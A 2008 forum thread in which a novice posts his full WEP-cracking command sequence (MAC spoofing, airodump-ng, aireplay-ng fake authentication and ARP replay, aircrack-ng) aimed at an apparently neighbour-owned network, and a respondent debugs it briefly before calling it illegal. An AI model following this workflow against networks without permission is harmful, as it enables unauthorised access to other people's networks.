Results 1 to 8 of 8

Thread: Injection problems in BT3 with Alfa-AWUS036H

  1. #1
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Default Injection problems in BT3 with Alfa-AWUS036H

    Hello, I just bought an Alfa-AWUS036H and its a really big improvment, now I can see 12 networks in my area, before ... only 4
    I'm new in Linux and I followed a method to find a wep password but I couldn't start injection to receive something.
    I received ... nothing
    Below you can see exactly what I've done and I noted every step to be easier for me :



    STEP 1:

    bt ~ # airmon-ng

    STEP 2:

    Interface Chipset Driver

    wlan0 RTL8187 r8187

    t ~ # airmon-ng stop wlan0

    STEP 3:

    Interface Chipset Driver

    wlan0 RTL8187 r8187 (monitor mode disabled)

    bt ~ # macchanger --mac 00:11:22:33:44:55 wlan0
    Current MAC: 00:c0:ca:1b:5f:3e (Alfa, Inc.)
    Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
    bt ~ #

    STEP 4:

    bt ~ # airmon-ng start wlan0


    Interface Chipset Driver

    wlan0 RTL8187 r8187 (monitor mode enabled)

    STEP 5:

    bt ~ #airodump-ng wlan0

    CH 2 ][ Elapsed: 52 s ][ 2008-06-27 10:28

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:1E:C7:1F:46:E1 58 111 0 0 6 54. WEP WEP 2WIRE328
    00:04:E2:4E:89:1E 58 58 22 2 1 11 OPN default
    00:1D:7E:1F:3D:8B 44 55 0 0 11 48 OPN linksys
    00:181:A2:20:08 41 28 0 0 11 54. WEP WEP Grillo's
    00:13:46:4A:CC:20 39 36 0 0 6 54. OPN Black Diamond Hotel
    00:0C:41:27:94:48 30 29 0 0 6 11 WEP WEP terracotta
    00:1B:5B:27:B8:71 28 7 0 0 6 54. WEP WEP Jacobs

    BSSID STATION PWR Rate Lost Packets Probes

    00:04:E2:4E:89:1E 00:1B:77:60:EF:85 75 0- 1 0 14 default
    00:1D:7E:1F:3D:8B 00:20:00:03:AF:2D 50 0- 1 46 262 linksys

    bt ~ #

    STEP6:

    bt ~ # airodump-ng -c 6 -w wep123 --bssid 00:1E:C7:1F:46:E1 wlan0


    CH 6 ][ Elapsed: 40 s ][ 2008-06-27 10:32

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:1E:C7:1F:46:E1 100 96 351 0 0 6 54. WEP WEP 2WIRE328

    BSSID STATION PWR Rate Lost Packets Probes

    STEP 7:

    bt ~ #
    bt ~ # aireplay-ng -1 0 -a 00:1E:C7:1F:46:E1 -h 00:11:22:33:44:55 -e 2wire328 wlan0
    10:35:22 Waiting for beacon frame (BSSID: 00:1E:C7:1F:46:E1) on channel 6

    10:35:22 Sending Authentication Request (Open System) [ACK]
    10:35:22 Authentication successful
    10:35:22 Sending Association Request [ACK]

    STEP 8:

    bt ~ # aireplay-ng -3 -b 00:1E:C7:1F:46:E1 -h 00:11:22:33:44:55 wlan0
    10:37:31 Waiting for beacon frame (BSSID: 00:1E:C7:1F:46:E1) on channel 6
    Saving ARP requests in replay_arp-0627-103731.cap
    You should also start airodump-ng to capture replies.
    Read 15230 packets (got 0 ARP requests and 24 ACKs), sent 0 packets...(0 pps)
    bt ~ #

    STEP 9:
    NOW I CHECK INJECTION:

    bt ~ # aireplay-ng -9 -b 00:1E:C7:1F:46:E1 -h 00:11:22:33:44:55 wlan0
    10:42:19 Trying broadcast probe requests...
    10:42:19 Injection is working!
    10:42:21 Found 5 APs

    10:42:21 Trying directed probe requests...
    10:42:21 00:1E:C7:1F:46:E1 - channel: 6 - '2WIRE328'
    10:42:26 Ping (min/avg/max): 0.092ms/142.687ms/196.018ms Power: 100.00
    10:42:26 25/30: 83%

    10:42:26 00:13:46:4A:CC:20 - channel: 6 - 'Black Diamond Hotel'
    10:42:28 Ping (min/avg/max): 15.992ms/61.595ms/148.001ms Power: 35.87
    10:42:28 30/30: 100%

    10:42:28 00:1B:5B:27:B8:71 - channel: 6 - 'Jacobs'
    10:42:34 Ping (min/avg/max): 11.996ms/35.988ms/51.994ms Power: 23.83
    10:42:34 6/30: 20%

    10:42:34 00:0C:41:27:94:48 - channel: 6 - 'terracotta'
    10:42:35 Ping (min/avg/max): 0.012ms/40.395ms/55.997ms Power: 29.00
    10:42:35 30/30: 100%

    10:42:35 00:1E:C7:E1:FA:71 - channel: 6 - 'SHAY'S Tack&Feed'
    10:42:38 Ping (min/avg/max): 23.992ms/66.398ms/107.993ms Power: 26.80
    10:42:38 30/30: 100%

    bt ~ #

    STEP 10:

    bt ~ # aircrack-ng -n -64 -b 00:1E:C7:1F:46:E1 wep123-01.cap
    Invalid WEP key length. [64,128,152,256,512]
    "aircrack-ng --help" for help.
    bt ~ #
    bt ~ # aircrack-ng -n -128 -b 00:1E:C7:1F:46:E1 wep123-01.cap
    Invalid WEP key length. [64,128,152,256,512]
    "aircrack-ng --help" for help.
    bt ~ #


    So, no injection (in step 8) to receive something but when I tested injection (step 9) to every network it looked to work ...
    Its very weird for me ... obviously , because its a new world for me ... )
    Please, give me an advice and tell me what I typed wrong. I think I need some special commands for this wireless card.

    Thank you

  2. #2
    Member Apollopimp's Avatar
    Join Date
    Nov 2007
    Posts
    120

    Default

    i glanced at what you posted and i see this.. also stay off other peoples networks if that's what your doing..

    Code:
    10:35:22 Sending Authentication Request (Open System) [ACK]
    10:35:22 Authentication successful
    10:35:22 Sending Association Request [ACK]
    after the

    Code:
    Sending Association Request [ACK]
    you should also get

    Code:
    Association successful
    so it should look like this


    Code:
    10:35:22 Sending Authentication Request (Open System) [ACK]
    10:35:22 Authentication successful
    10:35:22 Sending Association Request [ACK]
    10:35:22 Association successful
    follow this http://s32.photobucket.com/player.sw...fs=1&os=1&ap=1

  3. #3
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Default

    Thank you, you right ... I have a big problem with association. Finally I've got a message error
    "association denied (code 12) , wrong ESSID or WPA"

    I don't understand, its appear to be wep, wep in the list ...

    Any ideas ?

  4. #4
    Member Apollopimp's Avatar
    Join Date
    Nov 2007
    Posts
    120

    Default

    I don't understand, its appear to be wep, wep in the list ...
    well its clear that your trying to crack a network that is not yours so what you are doing is illegal and you wont get any help from anyone on these forums..

    if your doing something illegal keep it to your self we don't wanna hear about it or help you do it..

  5. #5
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Default

    Man, relax, I have my own high-speed internet and I don't need other. Its about my friend, next door neighbour, and we try to crack each other for fun.
    I want to find also if he secured 64 or 128 bit.
    So, you stopped to help me ?

  6. #6
    Member Apollopimp's Avatar
    Join Date
    Nov 2007
    Posts
    120

    Default

    ive given you all the help you need follow the link i gave you..

  7. #7
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Default

    Thank you, I followed that link and now I've got that (code 12) denied ...

  8. #8
    Member Apollopimp's Avatar
    Join Date
    Nov 2007
    Posts
    120

    Default

    well you allready posted you problen now search and find the answer

    heres your problem

    Code:
    association denied (code 12) , wrong ESSID or WPA

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •